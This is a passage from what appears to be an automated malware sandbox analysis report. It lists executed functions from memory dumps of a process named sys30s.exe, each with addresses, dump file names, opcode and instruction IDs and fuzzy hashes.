                                    • Opcode Fuzzy Hash: 5f6bbd75d07043d03c0a12f6f0184814fcdbacfaddb8914f6b8c469a1521fb64
                                    • Instruction Fuzzy Hash: F2E01A6205E3C14FE71307702C697A47F788B03215F0E15DBD088CB4F3D1584859D362
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002C0468, Relevance: .1, Instructions: 70COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.670541317.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bc6a39bde5d781247bcfbc56c74513b26f66451c87e26d26cdf0de07563c55cf
                                    • Instruction ID: ef9ad920e3cb7c730f573b4fa419b581358d21b11175615da8a0d228b23fd08b
                                    • Opcode Fuzzy Hash: bc6a39bde5d781247bcfbc56c74513b26f66451c87e26d26cdf0de07563c55cf
                                    • Instruction Fuzzy Hash: 6D21CD70C18204CFCB14DFA8E889BFDBBB4AB4A305F14253CD115672A1DB798909CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002C07A8, Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.670541317.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63c9fd6cb1bd5fbdb40ef437fa2dfd685a050b4914fff6569a00256084fb5ae0
                                    • Instruction ID: bdfb080024f9ed5f24ccecc7d0c775b38b0220dc02a3b67dac1d276ad096c8c0
                                    • Opcode Fuzzy Hash: 63c9fd6cb1bd5fbdb40ef437fa2dfd685a050b4914fff6569a00256084fb5ae0
                                    • Instruction Fuzzy Hash: BD019E74D0924ACFCF45DFB8C8515AEBBB1EF86304F0188AEC115A72A1DB351A49CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002C0448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.670541317.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0025b4e3cae1f3a1769d96ba9b8295deeb9dfe69cef863b8f6467e80fad3a4aa
                                    • Instruction ID: c93ca6638caf1bb85021a1f22876becaab1d9f96be55f29d1454acf761e89ace
                                    • Opcode Fuzzy Hash: 0025b4e3cae1f3a1769d96ba9b8295deeb9dfe69cef863b8f6467e80fad3a4aa
                                    • Instruction Fuzzy Hash: E8C02B300042058BC1142BC0785EB7DB65CC302317F081944720C02C308720C4D0C095
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 2124 Parent PID: 1284 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 00220550, Relevance: .2, Instructions: 159COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001E.00000002.683314052.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4592487db3380a0cb43369bf05a47a11983c362eb2f73bb3c382ac952845c3da
                                    • Instruction ID: 9262fd60f2479022127da4a4d6118649ab2fde012cbb8f9ade60c0e3768cfc0d
                                    • Opcode Fuzzy Hash: 4592487db3380a0cb43369bf05a47a11983c362eb2f73bb3c382ac952845c3da
                                    • Instruction Fuzzy Hash: 1261DF74E01208CFCB58DFB5D990AEDBBB2BF89304F20816AD419AB351DB359985CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00220560, Relevance: .2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001E.00000002.683314052.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 139b95c542d523cb37c63e1c6c0fb2c23cee85c1bbe1a4b7e5211e45c5336e0a
                                    • Instruction ID: 4fe0b117320affc3f6783075fdca2abe79ba5ad6c915607791a025d36b9fa608
                                    • Opcode Fuzzy Hash: 139b95c542d523cb37c63e1c6c0fb2c23cee85c1bbe1a4b7e5211e45c5336e0a
                                    • Instruction Fuzzy Hash: 6161DE74E01208CFCB58DFB5D990AEDBBB2BF89304F20806AD409AB355DB35A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002200B1, Relevance: .5, Instructions: 467COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001E.00000002.683314052.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fb27020f1d7bc41cc637723ae06d07571fb10c6644bc7e6e04f2d82d5f2b9ef4
                                    • Instruction ID: 9173082962d9a3ac7fe96187a9d09be1a444fb99c688146c36370b2c6f65d4ae
                                    • Opcode Fuzzy Hash: fb27020f1d7bc41cc637723ae06d07571fb10c6644bc7e6e04f2d82d5f2b9ef4
                                    • Instruction Fuzzy Hash: 92E0592105E3D15FC71357602CB46A47F745B03115F0E46EBD089DB4A3D55909A9D752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00220468, Relevance: .1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001E.00000002.683314052.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e1cbadeecc43e8edc98a9f408848ef3f520019b948de8740c6fe99902039dec
                                    • Instruction ID: c7be38b255ce0d3f35adf2b2d41d3e8ddb68b303c1bc0df906dc08fc0685464c
                                    • Opcode Fuzzy Hash: 4e1cbadeecc43e8edc98a9f408848ef3f520019b948de8740c6fe99902039dec
                                    • Instruction Fuzzy Hash: 0B215670D182589FCB15EFA4E8846FDBBB4AB4A301F006069D01AA72A2DB794A54CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00220448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001E.00000002.683314052.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27670137eaa9856f08e6f3d47565ca49510996e8fb394ec64b6393245d38b8d7
                                    • Instruction ID: d088f3ea2871237dcc6b36477839064d298700e65977b6d89abffce878b6ad88
                                    • Opcode Fuzzy Hash: 27670137eaa9856f08e6f3d47565ca49510996e8fb394ec64b6393245d38b8d7
                                    • Instruction Fuzzy Hash: 75C0223008020A8BC2003BC0B88C33CB2BC830232BF882800B20C02C328B2088F0C0AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions